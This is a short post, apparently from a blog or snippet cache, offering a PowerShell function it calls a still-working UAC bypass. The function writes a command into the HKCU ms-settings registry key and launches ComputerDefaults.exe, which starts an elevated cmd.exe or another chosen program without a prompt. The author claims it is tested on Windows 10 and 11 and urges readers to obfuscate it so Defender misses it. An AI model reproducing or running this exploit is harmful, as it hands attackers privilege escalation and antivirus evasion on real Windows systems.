One minute
This UAC Bypass Still Works
Of course, defender will catch this. Obfuscate, Obfuscate, Obfuscate.
Function BypassUAC {
<#
By default, starts an elevated CMD prompt.
Tested and fully working on Windows 10 & 11.
#>
Param (
[Parameter(Mandatory = $False)]
[String] $Process = "C:\windows\system32\cmd.exe",
[String] $Arguments = ""
)
If ( (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544") ) {
Remove-Item "HKCU:\software\classes\ms-settings" -Force -Recurse
} Else {
$RegistryKey = "HKCU:\software\classes\ms-settings\shell\open\command"
New-Item $RegistryKey -Force
New-ItemProperty $RegistryKey -Name "DelegateExecute" -Value $null -Force
Set-ItemProperty $RegistryKey -Name "(default)" -Value "$Process $Arguments" -Force
Start-Process "ComputerDefaults.exe"
}
}
- Tested and fully working on Windows 10 & 11.
- Added to cache: https://github.com/crimsonlabs-io/Cache